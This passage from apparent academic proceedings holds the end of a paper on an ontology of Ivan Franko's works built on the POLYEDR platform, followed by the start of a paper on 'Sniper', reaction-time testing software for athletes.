theoretical basis for the productive use of information and educational resources aimed at forming a single information and educational environment. The concept of transdisciplinarity is studied in the scientific works of S. Dovhyi [18], O. Stryzhak [19] and others. Transdisciplinary ontologies are important tools for performing scientific research. In particular, transdisciplinary ontologies of knowledge systems serve as important tools for creating network-centric cognitive services that provide analysis, structuring and selection of information according to certain criteria, which creates conditions for its further interpretation and application taking into account diverse structural relationships. In this case, the ontology is considered as a structural unification of a particular subject area with the help of semantic models that contain descriptions of basic information in a hierarchical order based on their properties and interactions. Methods used: analysis of information to distinguish the main concepts and unite them into corresponding concept classes; the classification and systematization methods to create an Excel table on the basis of concept classes with various concept correlations; and the visualization method to create an ontological graph based on the formalized description of the fragment of the Ukrainian Literature program.
Visualization of the formed ontology is carried out with the help of the cognitive IT platform "POLYEDR" (KIT "POLYEDR") [20]. "POLYEDR" provides possibilities to analyze and structure information according to distinguished parameters on the basis of contextual correlations. The application of set theory and graph theory principles is essential for the creation of ontological models. The cognitive IT platform is based on the method of recursive reduction, which helps to transform information by structuring it and further converting it into an interactive document [19]. Using the method of recursive reduction, it is possible to form the ontology O = ⟨X, R, F⟩, where X represents the set of concepts of a subject field, R the set of relations between the concepts, and F the set of functions interpreting X and R. Structuring by recursive reduction comprises the recursive application of a reduction operator. The reduction operator is a composition of three operators applied consistently: F_rd = F_x ∘ F_smr ∘ F_ct, where F_x is the operator of object identification in X, F_smr is the operator of correlation identification in R, and F_ct is the operator of context identification, with the help of which the functions of interpretation are defined in the ontology O = ⟨X, R, F⟩. The method of recursive reduction is used to create a computer program for the automatic processing of information in a structurally distributed configuration. The recursive reducer also produces an xml file, which represents the ontology and is available for application using the cognitive platform "POLYEDR".
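As a rough illustration of this pipeline (not the actual KIT "POLYEDR" implementation, which is not publicly documented), the following Python sketch models O = ⟨X, R, F⟩ and applies three toy operators sequentially; the concept- and relation-extraction heuristics are invented placeholders.

```python
# Toy model of O = <X, R, F> and the reduction operator applied as a
# sequence F_x, F_smr, F_ct. All heuristics are invented placeholders.
from dataclasses import dataclass, field

@dataclass
class Ontology:
    X: set = field(default_factory=set)    # concepts
    R: set = field(default_factory=set)    # (concept, relation, concept)
    F: dict = field(default_factory=dict)  # concept -> interpreting contexts

def F_x(text, onto):
    # Object identification in X: treat capitalized words as concepts.
    onto.X.update(w.strip(".,") for w in text.split() if w.istitle())
    return onto

def F_smr(text, onto):
    # Correlation identification in R: link concepts co-occurring in a sentence.
    for sentence in text.split("."):
        found = [c for c in onto.X if c in sentence]
        onto.R.update((a, "co-occurs", b) for a in found for b in found if a != b)
    return onto

def F_ct(text, onto):
    # Context identification: keep the sentences mentioning each concept.
    for c in onto.X:
        onto.F[c] = [s.strip() for s in text.split(".") if c in s]
    return onto

def F_rd(text):
    """Reduction operator: the three operators applied consistently."""
    return F_ct(text, F_smr(text, F_x(text, Ontology())))

onto = F_rd("Ivan Franko wrote Moses. Moses is a poem.")
print(sorted(onto.X), len(onto.R), onto.F["Moses"])
```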
3 Experiments

The ontology is formed by means of MS Excel, by creating the ontology structure and forming the content of the ontological graphs. Visualization of the formed ontology is carried out with the help of the cognitive IT platform "POLYEDR" (KIT "POLYEDR"), namely by loading the Excel table into the graph editor which is a part of the platform. The method of recursive reduction is realized in the process of converting the fragment of the Ukrainian Literature program devoted to Ivan Franko into an ontology. The ontology is created as a result of the recursive reducer conversion and contains such categories as Poetic Collection 'From Peaks and Valleys', Poetic Collection 'Withered Leaves', Philosophical Poetry, Poem 'Moses' and Prose of Ivan Franko, with subcategories such as Genre, Composition, Ideas and Problems, etc. Ontological descriptions are formed with the help of an MS Excel spreadsheet (Fig. 1). The spreadsheet contains the table of structure, which defines the information about the objects, and the table of attributes, which defines the information about the object characteristics. The structure of the spreadsheet reflects a set of different connection types: the first column contains the name of the parent object, the second column defines the connections, and the third column (and all following columns) contains the child objects (Fig. 1). These connections are represented as edges in the ontograph (Fig. 2). The spreadsheet is loaded into editor.ulif.org.ua, a part of the cognitive IT platform "POLYEDR", with further generation of graph nodes and graph edges (Fig. 2), which represent the distinguished concepts (graph nodes) and their correlations (graph edges). Using the functions of the ontology (graph) editor, we can choose the necessary elements of the ontology with the help of filtering.
Fig. 1. Formation of ontological descriptions using MS Excel spreadsheet (names of ontology concepts)
For example, one can find information about Poetic Collection 'Withered Leaves' with all its subcategories, such as the particular poems of the collection, their composition, genres, representations of autobiographical elements, reflection of the love theme, connections to the artistic context, etc. The CIT platform provides filtering of two types: hierarchical filtering (showing the connections between objects) and attributive filtering (distinguishing object attributes). We have used hierarchical filtering for the Poetic Collection 'Withered Leaves', so the result is a tree which demonstrates the correlations between the objects of the ontology. To activate hierarchical filtering, one presses the button with the name of the object (Fig. 2).
Fig. 2. A fragment of the ontology in the form of an ontograph
The ontology editor also offers internal (covering information uploaded to the platform server) and external (covering information resources on the Internet) semantic search. Such options are useful for further ontology expansion in accordance with emerging educational and scientific tasks.
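Under the column convention just described (parent object, connection type, then child objects), the spreadsheet-to-ontograph conversion and the hierarchical filtering can be sketched as follows; the rows, the object names, and the use of plain Python structures instead of the platform's graph editor are illustrative assumptions.

```python
# Sketch: rows follow the convention above: parent in column 1,
# connection type in column 2, child objects in the remaining columns.
# The rows themselves are invented for illustration; openpyxl could
# read them from a real .xlsx file instead.
from collections import defaultdict

rows = [
    ["Ivan Franko", "wrote", "Withered Leaves", "Moses"],
    ["Withered Leaves", "has", "Genre", "Composition", "Love Theme"],
    ["Moses", "has", "Genre", "Ideas and Problems"],
]

children = defaultdict(list)
for parent, _connection, *kids in rows:
    children[parent].extend(kids)          # graph edges of the ontograph

def hierarchical_filter(obj, depth=0):
    """Print the subtree of one object, as in hierarchical filtering."""
    print("  " * depth + obj)
    for child in children.get(obj, []):
        hierarchical_filter(child, depth + 1)

hierarchical_filter("Withered Leaves")
```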
4 Results

The transdisciplinary ontology formed on the basis of Ivan Franko's work appears as an interactive document with a variety of visual representations, which demonstrates different angles of information perception and different projections of the objects of knowledge, provides prospects for their comprehension from integrative positions, and contributes to the formation of a holistic view through the reproduced relationships and their hierarchical order. The ontology is created by performing actions in a definite sequence: analysis of the program fragment, its conceptualization with the definition of the main concepts and their semantic correlations, and construction of the network of semantic correlations. The ontological interface forms a cognitive and communicative scenario of possible ways of structuring information and presenting it as a part of a single research and educational space. The cognitive platform tools provide a precise display of the notions of a chosen subject area (here, the artistic work of Ivan Franko), their attributes and semantically connected contexts in a transdisciplinary representation. The created transdisciplinary ontology supports research activities directed to the usage of multi-level information environment resources, to the identification of multi-faceted scientific problems (namely, the different activity types projected on the artistic works of the poet), and to increasing the range of ontology components. Such ontologies can cover a wide range of thematic directions in the Humanities, providing a basis for distance education and research, especially considering the capacity of the cognitive IT platform in terms of the number of participating researchers and the scientific resources represented.
5 Discussion

Examples of the implementation of transdisciplinary ontological strategies in the Humanities are the projects "Shevchenko Portal" (http://kobzar.ua/) and "Museum Planet" (https://museum.ulif.org.ua/), designed by the scientists of the National Center "The Junior Academy of Sciences of Ukraine", and "Museum Portal" (https://museum-portal.com/ua/), created in collaboration with "The Junior Academy of Sciences of Ukraine". The scientists of the Academy have also elaborated an ontological office for research [21]. The Shevchenko Portal project makes it possible to use methods of system and ontological analysis and to construct information models for studying information about the life and work of the Ukrainian poet; it offers tools for creating e-scenarios, for creating taxonomies and their graphic display, and for creating interactive 3D panoramas. The digitalization of the Humanities takes place in different directions: by integrating digital technologies into the humanities as an integral part of them, which modifies them in social and cultural dimensions; and by using digital technologies as tools that help automate and unify certain elements of analysis, as well as certain types of information analysis in the humanities, to ensure the fullest coverage and systematization of the components selected for analysis. At the same time, the integration of digital technologies and the humanities emphasizes the transdisciplinary aspects of scientific
thinking, which significantly expand the boundaries of scientific perception by creating new areas of research. Transdisciplinary dimensions of research in the context of ontological representation direct scientific inquiry to the formation and understanding of possible combinations of diverse aspects of certain phenomena, and identify opportunities to consider individual fragments of scientific knowledge by tracking correlations and/or considering their multidimensionality. Transdisciplinary research planes form interrelated contexts of research activity and of the perception and use of scientific knowledge, which generate multidimensional correlations between fragments of empirical and theoretical insights. The concept of transdisciplinarity forms the theoretical basis for the productive use of information and educational resources aimed at forming a single information and educational environment. In particular, transdisciplinary ontologies of knowledge systems are important tools for creating network-centric cognitive services that provide analysis, structuring and selection of information according to certain criteria, which allows its further interpretation and application in a variety of structural correlations. In this case, the ontology is considered as a structural unification of a particular subject area with the help of semantic models that contain descriptions of basic information in a hierarchical order based on their properties and interactions. Ontological modeling makes it possible to structure the material under study by identifying its structural components according to specific criteria and determining the relevant relationships between them. It demonstrates the structural framework, as well as the ways, types and forms of the diverse relationships between the constituent elements of the researched scientific works, works of art, etc. The use of ontological modeling in the humanities (literature, cultural studies, sociology, etc.) contributes to the formation of clear and accurate correlations between the components of the structure of the objects of analysis, as well as the determination of all existing (and possible) correlations. The advantages of analyzing the products of the humanities with the help of ontological modeling include the coverage and systematization of all structural components according to the specified parameters, which ensures the adequacy and completeness of the subsequent stages of scientific analysis (based on the data obtained from ontological modeling). Visualization of the ontology can be carried out with the help of the cognitive IT platform "POLYEDR" (KIT "POLYEDR") [20]. This platform provides opportunities for the conceptual analysis of large amounts of spatially distributed unstructured information (Big Data), for structuring this information, and for determining contextual correlations for further correlation forecasting and information selection. Designing a transdisciplinary ontology based on the work of Ivan Franko, studied according to the program of Ukrainian literature for grades 10–11 (standard level), provides opportunities for the perception of clearly structured information with a visualized mapping of structural components, which creates conditions for an integral understanding of the educational material and opportunities for multilevel analysis.
The process of forming a transdisciplinary ontology consists of the following stages: semantic analysis of the program in Ukrainian literature, taxonomization of the program, formation of the document structure based on selected terms/concepts (term classes, objects of term classes)
and contexts, definition of their characteristics and correlations, and the direct formation of ontological descriptions. Ontological descriptions are formed with an MS Excel spreadsheet that comprises the names of the ontology concepts (Fig. 1). Visualization of the formed ontology is carried out with the help of the cognitive IT platform "POLYEDR" (KIT "POLYEDR") by loading the MS Excel file into the graph editor, which is a component of the platform. The ontology can be represented in the form of an ontograph (Fig. 2), which demonstrates the main concepts of the chosen subject area and their intercorrelations. This ontograph represents the structure of the educational material devoted to the study of Ivan Franko's literary works. One of the types of representation of a transdisciplinary ontology is an object mapping (Fig. 3), which is a set of images of those concepts that are components of the ontology. The ontology navigator (Fig. 3) reproduces the structure of the ontology and allows the researcher to search for specific objects of the ontology. This object mapping reflects the objects of the ontology, which represent the general information about Ivan Franko, the collections of his poetry, and particular poetic and prose works according to the program in Ukrainian literature.
Fig. 3. Object mapping ontology
An important aspect of transdisciplinary ontology is the visual representation in the form of a prism (Fig. 4). The facets of the prism are appropriately structured fragments of Ivan Franko's work, covering the diverse activities of the writer (artistic, scientific, translation, journalistic work, etc.) with appropriate concretization and detailing in accordance with the structuring of the material in the Ukrainian literature program. The transdisciplinary ontology formed on the basis of Ivan Franko's work thus appears as an interactive document with a variety of visual representations, which demonstrates different angles of perception of information and different projections of the objects of knowledge, providing prospects for their comprehension from integrative positions through the reproduced relationships and hierarchical order. The universality of transdisciplinary approaches to research, manifested in the creation of a holistic paradigm of scientific thinking, which includes the formulation of concepts and principles defining the tools for transdisciplinary research, determines the need for theoretical justifications aimed at forming the fundamental principles of the terminological and classification systems of various subject areas.
Fig. 4. Ontology in the form of a prism
The use of transdisciplinary ontologies creates the preconditions for the constant expansion of the scope of research problems both within a particular discipline and within the interaction of different subject areas, which helps to determine structural and semantic correlations and correspondences. As for Ivan Franko's ontology, we can trace its transdisciplinary aspects by studying the different facets of his rich creative activity as well as by considering the philosophical, psychological, linguistic and ethnographic implications in his literary works.
6 Conclusions

The concept of ontological modeling in the Humanities represents the phenomenon of multivector digital resources, which involves the use of different forms of information (textual, audio, graphic, numerical, etc.) and various possibilities of structural and hierarchical organization of information to perform various cognitive, educational and research tasks. Important aspects of ontology usage in the Humanities are the formation of new operational capabilities of research due to the use of digital instruments, as well as the transformation of digital instruments into components of contemporary comprehension. Ontological modeling in the Humanities involves the creation of digital resources and the accumulation of digital materials, with their further processing and systematization, which opens a wide range of opportunities depending on the research and educational goals, objectives and specific features of the information being studied. Scholars pay considerable attention to substantiating the theoretical foundations of ontological modeling, covering the principles of the transdisciplinary paradigm, methods and tools of digital analysis, common digital models and algorithms, methods of processing big data, etc. The transdisciplinary ontology based on the artistic work of the Ukrainian writer Ivan Franko shows the precise structure of the different spheres of his activity, including artistic achievements in the fields of poetry, drama, prose and translation, and different branches of science (such as philosophy and literary studies), with the necessary subdivision according to the focus on a
particular literary work through the prism of its generic characteristics. The ontology demonstrates all the concepts and terms required to form an integrated perception of the subject being analyzed. Prospects for the use of transdisciplinary ontology as one of the most promising digital tools are determined by the possibility of updating any element of the ontology, expanding it by involving new elements and subsystems of elements, scaling the ontology depending on scientific and educational needs, and integrating and synchronizing different transdisciplinary ontologies. The use of computer ontologies to study scientific problems in the Humanities makes it possible to systematize and structure the research information and to display it in various visual forms that represent the existing structural correlations (including non-obvious correlations and correlations that are difficult to trace when operating with large amounts of information); it also provides the ability to search, process and study information by certain structural parameters.
References

1. Paquette, G., Marino, O., Bejaoui, R.: A new competency ontology for learning environments personalization. Smart Learn. Environ. 8(1), 1–23 (2021). https://doi.org/10.1186/s40561-021-00160-z
2. Chimalakonda, S., Nori, K.V.: An ontology based modeling framework for design of educational technologies. Smart Learn. Environ. 7(28) (2020). https://doi.org/10.1186/s40561-020-00135-6
3. Chen, J., Gu, J.: ADOL: a novel framework for automatic domain ontology learning. J. Supercomput. 77(1), 152–169 (2020). https://doi.org/10.1007/s11227-020-03261-7
4. Aeiad, E., Meziane, F.: An adaptable and personalised E-learning system applied to computer science programmes design. Educ. Inf. Technol. 24(2), 1485–1509 (2018). https://doi.org/10.1007/s10639-018-9836-x
5. Amane, M., Aissaoui, K., Berrada, M.: ERSDO: E-learning recommender system based on dynamic ontology. Educ. Inf. Technol. (2022). https://doi.org/10.1007/s10639-022-10914-y
6. Wongthongtham, P., Chan, K.Y., Potdar, V., Abu-Salih, B., Gaikwad, S., Jain, P.: State-of-the-art ontology annotation for personalised teaching and learning and prospects for smart learning recommender based on multiple intelligence and fuzzy ontology. Int. J. Fuzzy Syst. 20(4), 1357–1372 (2018). https://doi.org/10.1007/s40815-018-0467-6
7. Shanshan, S., Mingjin, G., Lijuan, L.: An improved hybrid ontology-based approach for online learning resource recommendations. Educ. Tech. Res. Dev. 69(5), 2637–2661 (2021). https://doi.org/10.1007/s11423-021-10029-0
8. Buinytska, O.P.: Structural-functional model of the university information and educational environment. Inf. Technol. Learn. Tools 69(1), 268–278 (2019). https://doi.org/10.33407/itlt.v69i1.2313
9. Iatrellis, O., Kameas, A., Fitsilis, P.: EDUC8 ontology: semantic modeling of multi-facet learning pathways. Educ. Inf. Technol. 24(4), 2371–2390 (2019). https://doi.org/10.1007/s10639-019-09877-4
10. Stancin, K., Poscic, P., Jaksic, D.: Ontologies in education – state of the art. Educ. Inf. Technol. 25(6), 5301–5320 (2020). https://doi.org/10.1007/s10639-020-10226-z
11. López-Zambrano, J., Lara, J.A., Romero, C.: Improving the portability of predicting students' performance models by using ontologies. J. Comput. High. Educ. 1–19 (2021). https://doi.org/10.1007/s12528-021-09273-3
12. Akremi, H., Zghal, S.: DOF: a generic approach of domain ontology fuzzification. Front. Comp. Sci. 15(3), 1–12 (2020). https://doi.org/10.1007/s11704-020-9354-z
13. Angelini, M., Daraio, C., Lenzerini, M., Leotta, F., Santucci, G.: Performance model's development: a novel approach encompassing ontology-based data access and visual analytics. Scientometrics 125(2), 865–892 (2020). https://doi.org/10.1007/s11192-020-03689-x
14. Gao, W., Guo, Y., Wang, K.: Ontology algorithm using singular value decomposition and applied in multidisciplinary. Clust. Comput. 19(4), 2201–2210 (2016). https://doi.org/10.1007/s10586-016-0651-0
15. Stryzhak, O., Horborukov, V., Prychodniuk, V., Franchuk, O., Chepkov, R.: Decision-making system based on the ontology of the choice problem. J. Phys.: Conf. Ser. 1828(1), 012007 (2021)
16. Oberle, D., Guarino, N., Staab, S.: What is an ontology? In: Staab, S., Studer, R. (eds.) Handbook on Ontologies, pp. 1–17. Springer (2009). https://doi.org/10.1007/978-3-540-92673-3_0
17. Nadutenko, M., Prykhodniuk, V., Shyrokov, V., Stryzhak, O.: Ontology-driven lexicographic systems. In: Arai, K. (ed.) Advances in Information and Communication, FICC 2022, vol. 438, pp. 204–215. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-98012-2_16
18. Dovgyi, S., Lisovyi, O., Gayevska, N., Mosenkis, I.: Ontological fundamentals of scientific and education portals. In: Ilchenko, M., Uryvsky, L., Globa, L. (eds.) MCT 2019. LNNS, vol. 152, pp. 127–157. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-58359-0_8
19. Stryzhak, O., Prychodniuk, V., Podlipaiev, V.: Model of transdisciplinary representation of GEO spatial information. In: Ilchenko, M., Uryvsky, L., Globa, L. (eds.) UKRMICO 2018. LNEE, vol. 560, pp. 34–75. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-16770-7_3
20. Stryzhak, O.Y., Velychko, V.Y., Palahin, O.V., et al.: Certificate of copyright to the work № 96078 dated 17.02.2020, Computer program "Cognitive IT platform POLYEDR" ("KIT POLYEDR") ("POLYHEDRON"). Ofitsiinyi Biuleten, vol. 57, pp. 402–403 (2020)
21. Dovhyi, S.O., Stryzhak, O.Y., Andrushchenko, T.I., et al.: Ontological Office for the Study of the Life and Work of Taras Shevchenko in the Scientific and Educational Portal KOBZAR.UA: monograph. Instytut obdarovanoi dytyny, Kyiv (2016)
Software Service for Analyzing Reactions to a Moving Object Constantine Bazilo1(B) , Yuriy Petrenko2 , Liudmyla Frolova2 , Stanislav Kovalenko2 , Kostiantyn Liubchenko2 , and Andrii Ruban3 1 Cherkasy State Technological University, Cherkasy, Ukraine
[email protected] 2 Bohdan Khmelnytsky National University of Cherkasy, Cherkasy, Ukraine 3 Cherkasy Medical Academy, Cherkasy, Ukraine
Abstract. The paper presents the results of testing the developed software service for the analysis of reactions to a moving object, which provides organization and convenient operational control of the diagnostic procedure. To implement this procedure, the dynamic characteristics of the processes of excitation and inhibition in the central nervous system, in terms of the accuracy of the sensorimotor response, are studied in groups of athletes of different ages, qualifications and specializations. High stability of the presented software product is demonstrated, regardless of the number and duration of the conducted studies. The results of experimental tests of the developed service are also given, which confirm the high informativeness and reliability of the test results on a large sample of subjects of different age groups. Prospects for the use of this software service in sports, medical, psychological, physiological and aerospace practice, as well as in pedagogical practice for diagnosing the functional state of the central nervous system, are shown. Keywords: Software service · reaction to a moving object · central nervous system · balance of nervous processes · visual-motor reaction
1 Introduction

Modern genetics holds that each person has genetically determined features of the functioning of the nervous system, which I.P. Pavlov singled out as the main properties of nervous processes: strength, balance and mobility. Currently, the concept of equilibrium or balance of nervous processes is replaced by dynamism, with which the nervous system generates the process of excitation or inhibition [1, 2]. The main feature of this property of nervous processes is the rate of development of conditioned reflexes and differentiations [3]. When analyzing the balance of nervous processes, a comparison of the strength of the processes of excitation and inhibition is made in [4]. If both processes are strong and mutually compensate each other, then we can speak of the balance of these processes [5]. At the same time, there is an external balance (characterizing the emotional and motivational nature of the response) and an internal one (characterizing the need for motor activity [6]). During the development of differentiation, a breakdown
of one of the processes (excitation or inhibition) can be observed; that is, one of the processes will have higher activity not only in the cerebral cortex but also in other areas [7]. The foregoing shows that there are large-scale connections between the central nervous system and mental actions, which are fundamental in the perception of movements and the formation of the representation of such a motor act. This provides a scientific basis for research on the influence of the balance of nervous processes on human motor activity. Currently, in psychophysiology, sports physiology and sports medicine, various methods have been developed and used to determine the balance of nervous processes in the central nervous system. These techniques are based on the reaction to a moving object (RMO) and are implemented as automated systems for testing and data acquisition. Some methods are complex test programs which include the determination of the latent period of the visual-motor reaction with the predominance of excitation or inhibition processes [8–10], as well as separately developed methods for assessing the time of a person's reaction to moving objects [11, 12]. The disadvantages of such methods are the restriction of object movement to the frontal or horizontal plane, the lack of standardization of the measurement process, the fixed timing, the absence of an algorithm and of quantitative characteristics of the relationship between the processes of excitation and inhibition, the failure to take into account movement from the periphery, etc. Moreover, the existing methodological techniques for determining the balance of nervous processes either do not allow a quantitative assessment of this property or require sophisticated equipment or a significant investment of time. All these methods give only an integral assessment of balance, i.e., they show the predominance of one process over the other or its absence. Today there is a need for new characteristics that are not measured by known technical developments: the ratio of the processes of excitation and inhibition under complex and simplified conditions of perception, as well as the peculiarities of the response of different contingents of the population.
2 Problem Statement

The balance of excitation and inhibition processes has recently attracted the attention of scientists owing to the role of the balance of the nervous system not only in studying the human condition, but also in analyzing the psychological characteristics of behavior in professional activities. Interest in the problem stems from understanding the mechanisms of regulation of the processes of excitation and inhibition at the level of neurons, where the balance is maintained in response to changes in input and output activity. Thus, the research of H.Y. He & H.T. Cline [2] suggests that decreased excitatory or inhibitory inputs can affect visual-motor behavior. There is keen interest in the problem of the balance of excitation and inhibition at the mesoscopic level of populations of neurons, which shows that a working brain needs to reach a state where the irregular dynamics of input data allows efficient processing of information. At the same time, D. Malagarriga, A.E.P. Villa, J. Garcia-Ojalvo & A.J. Pons [4] note that it is possible to increase the processing power of the brain due to a certain synchronization of excitation and inhibition. The importance of modeling the synchronization of excitation and inhibition is proven
in studies on the control of the balanced processes of dynamic range and input gating in many brain circuits. Also, A. Bhatia, S. Moza & U.S. Bhalla [1] note the significance of the combination of precise balance and dynamic excitation and inhibition delays for accentuating the input signal at a certain point in time, which affects the spatial orientation of a person. Considering the dynamics of the processes of excitation and inhibition on a time scale, N. Dehghani, A. Peyrache, B. Telenczuk et al. [7] have found that the imbalance of brain activity in its different states is caused not by external input signals but rather by periodic activity in the local network. The importance of such information lies in understanding changes in the ratio of excitation and inhibition across time ranges and changes in the state of the organism. It is also important to study the activity of the brain under the dominance of various neurotransmitters with synergy between excitation and inhibition, as done by J. Frohlich [5], where these processes act as an indicator for assessing the performance of the human brain and the formation of flexible behavior. It is a certain balance of excitation and inhibition that forms complex models of human activity, which are an important aspect of any profession. The relationship between the autonomic nervous system and mental processes in the formation of motor imagination, which affects the motor activity of a person, is not ignored either, as noted by C. Collet, F. Di Rienzo, N. El Hoyek & A. Guillot [6]. In this context, variation in excitatory processes is one of the factors in creating imaginary movements, the ability for which is affected by differences in the neural networks of people. Thus, human learning is associated with processes in the central nervous system since, as J.C. Lee & E.J. Livesey prove [3], input signals have an excitatory and inhibitory effect. Depending on the polarity of the input signal, causal learning can be built, meaning that the nature of the signals can increase or decrease a certain result of information assimilation. All of the above methods have a number of disadvantages that limit their use for assessing the characteristics of excitation and inhibition in the central nervous system, namely:

• in real conditions of professional activity, the movement of an object towards a person in the frontal plane is not always present, and in some cases (sports and military activities involving many subjects), the reaction and its characteristics with the movement of an object from the periphery are more important;
• the criteria for the correlation of the processes of excitation and inhibition in the central nervous system in response to a moving object are not defined;
• the velocity characteristics of the movement of the object and its acceleration are not defined.

Taking into account recent studies, it can be stated that the problem of establishing the degree of balance by comparing excitation and inhibition indicators in the central nervous system is quite relevant, which gives grounds for the development of new methods for testing these processes. Therefore, this paper proposes a software service for analyzing reactions to a moving object and estimating the parameters of excitation and inhibition in the central nervous
system in different fields of vision under complex and simplified conditions of perception, taking into account the response characteristics of different contingents of the population. The purpose of the study is to develop a service for analyzing reactions to a moving object that can evaluate the parameters of excitation and inhibition in the central nervous system in different fields of vision and increase the objectivity of diagnosing balance. To achieve this aim, it is necessary to solve the following tasks:

1. Development of the "Sniper" software service.
2. Description of the main modes of operation of the developed software service.
3. Experimental tests of the "Sniper" software service.
4. Analysis of the results of using the software service.
3 Materials and Methods

The software product "Sniper" [13] has been developed by the authors on the basis of a simplified version of the program whose basic element is a patented method for determining excitation and inhibition in the central nervous system [14]. The proposed idea addresses the task of determining new qualitative characteristics of the reaction to a moving object and of the ratio of the processes of excitation and inhibition in the central nervous system, increasing the objectivity and efficiency of assessing these characteristics of the human body. The method for determining excitation and inhibition in the central nervous system, which underlies the developed program, consists in presenting a test object in the form of a closed contour in the center of the screen and registering and evaluating the reaction to its coincidence with a moving object. The distinctive feature of this solution is that point objects move towards the test object from different sectors of the screen, with the reaction to reaching its middle registered with account for the delay or advance of this reaction. The software product is developed in the Delphi programming language following the object-oriented programming paradigm; for this, classes, structures and other data types have been defined and implemented. The main classes of the program are the following:
TCircle for working with individual point objects and target; TCircles for working with a group of point objects; TStatistics for storing and processing test results; TFormLKN for organizing the program interface.
The constructed object model is based on the basic principles of object-oriented programming (encapsulation, inheritance and polymorphism). A quicksort-based routine for calculating the median of distances and the median time is used as an auxiliary one. The block diagram of the developed service is shown in Fig. 1.
Fig. 1. Block diagram of the “Sniper” software service
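The auxiliary median routine mentioned above is part of the Delphi sources, which the paper does not list; a sort-based Python equivalent might look as follows (the even-sample convention of averaging the two middle values is an assumption).

```python
def median(values):
    """Median of a sample, used for the distance and time statistics.

    Python's sorted() is Timsort rather than the quicksort mentioned in
    the paper; any O(n log n) sort yields the same median.
    """
    s = sorted(values)
    n = len(s)
    if n % 2:                               # odd sample size: middle element
        return s[n // 2]
    return (s[n // 2 - 1] + s[n // 2]) / 2  # even: mean of the middle pair

# Distances (mm) of the first five tasks in Table 1 below:
print(median([4.76, -0.79, 8.2, 2.62, 3.74]))  # -> 3.74
```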
Generally, the product makes it possible to determine the parameters of the reaction to a moving or stationary object under various conditions of presentation of a visual stimulus. It works in Windows XP–10 and allows making the following settings (Fig. 2):

1) last name, first name, middle name and year of birth of the examined;
2) language interface (Ukrainian, English);
3) operating parameters of point objects and targets (velocity, acceleration, projectile diameter, target diameter);
4) operating mode (accuracy, peripheral reaction, central reaction);
5) type of reaction (simple visual-motor reaction (SVMR), choice reaction of one stimulus out of three (CR1–3), choice reaction of two stimuli out of three (CR2–3));
6) task generation parameters (number of tasks, time intervals, number of intervals);
7) delay between tasks;
8) name of the file where the test results are stored.
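For illustration, such a settings panel maps naturally onto a single configuration record; the field names below are invented for this sketch and are not taken from the Delphi sources, while the default values mirror the test described in Sect. 5.

```python
# Hypothetical configuration record mirroring the settings panel; the
# field names are invented for this sketch, not taken from the Delphi
# sources. Defaults mirror the test reported in Sect. 5.
from dataclasses import dataclass

@dataclass
class TestConfig:
    examinee: str
    year_of_birth: int
    language: str = "English"             # or "Ukrainian"
    velocity_mm_s: float = 250.0          # point-object velocity
    acceleration_mm_s2: float = 0.0
    projectile_diameter_mm: float = 15.0
    target_diameter_mm: float = 15.0
    mode: str = "Accuracy"                # or "Peripheral reaction", "Central reaction"
    reaction: str = "SVMR"                # or "CR1-3", "CR2-3"
    number_of_tasks: int = 32
    delay_between_tasks: bool = True
    results_file: str = "1"

cfg = TestConfig("Petro I. Sydorenko", 2005)
```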
Fig. 2. The “Sniper” software interface: 1 – data of the examined; 2 – language; 3 – operating parameters of point objects and targets; 4 – operating modes; 5 – types of reactions; 6 – tasks generation parameters; 7 – delay; 8 – the document in which the results are stored; 9 – button “Start”; 10 – test results; 11 – modes screen; 12 – point object (projectile); 13 – target
Figure 3 shows the diagram of the zones and the placement of point objects (projectiles) of the program. A convenient modern interface of the program allows the user to interactively observe the current settings in the left part of the window. Consider the essence of different program modes.
Fig. 3. The diagram of the zones and the placement of point objects (projectiles)
4 Experiments

Among the main modes of operation of the developed "Sniper" software product, the following should be highlighted: "Accuracy", "Peripheral reaction", "Central reaction" and "Efficiency".

"Accuracy" Mode. The peculiarity of this mode lies in the presentation of a test object in the center of the screen in the form of a closed contour (target) and the registration and evaluation of the reaction to the coincidence of a point (moving) object with the target. Moving (point) objects move towards the target from different sectors of the screen, which are located on a circle around it, taking into account the delay and advance of the reaction. This mode is characterized by uniform and uniformly accelerated motion of point objects. Operation in the "Accuracy" mode is started by pressing the "Start" button (Fig. 4). The examined must respond as accurately as possible to the movement of a point object, at the moment its center coincides with the center of the target, by pressing the Ctrl button.

"Peripheral Reaction" Mode. The "Peripheral reaction" mode makes it possible to set the types of reactions: SVMR, CR1–3, CR2–3. The choice of reaction types is provided by block 5 (see Fig. 2). Operation with any chosen type of reaction in the "Peripheral reaction" mode is started by pressing the "Start" button (Fig. 5).
Fig. 4. The “Sniper” software interface in “Accuracy” mode (the target is shown in green, point objects in red)
Fig. 5. The “Sniper” software interface in “Peripheral reaction” mode (the target is shown in green, point objects in blue)
The task of the examined, depending on the selected type of reaction, is for SVMR to respond as quickly as possible to the movement of a point object from any zone, regardless of its color (green, yellow, red), by pressing any Ctrl button; for CR1–3 to respond as quickly as possible to the movement of a green point object from any zone by
pressing any Ctrl button; and for CR2–3, to respond as quickly as possible to the movement of a green point object from any zone by pressing the right Ctrl button with the right hand. When a red point object moves, you must press the left Ctrl button with the left hand. If there is a movement of a yellow point object, then there should be no reaction to it.

"Central Reaction" Mode. The "Central reaction" mode allows setting the same types of reaction as the "Peripheral reaction" mode (Fig. 6).
Fig. 6. The “Sniper” software interface in “Central reaction” mode
The task of the examined, depending on the selected type of reaction, is for SVMR to respond as quickly as possible to a change in a point object in the central zone, regardless of its color (green, yellow, red), by pressing any Ctrl button; for CR1–3 to respond as quickly as possible to a change in the color of a point object in the central zone, if this color turns green, by pressing any Ctrl button; for CR2–3 to respond as quickly as possible to a change in the color of a point object in the central zone by pressing the right Ctrl button with the right hand if this color turns green, and with the left hand the left Ctrl button if this color turns red. If there is a change in the color of a point object to yellow, then there should be no reaction to it. “Efficiency” Mode. The peculiarity of this mode is that when choosing the “Peripheral reaction” or “Central reaction” modes and the type of reaction CR2–3, the software makes it possible to set the duration of time intervals and their number for generating tasks. For example, when choosing the “Peripheral reaction” mode and the type of reaction CR2–3, the examined is presented in the center of the screen with a test object in the form of a closed contour (target) and the velocity of its reaction to the movement of a green point object from any zone is recorded and evaluated by pressing the right Ctrl button with the right hand. When a red point object moves, you must press the left Ctrl button with the
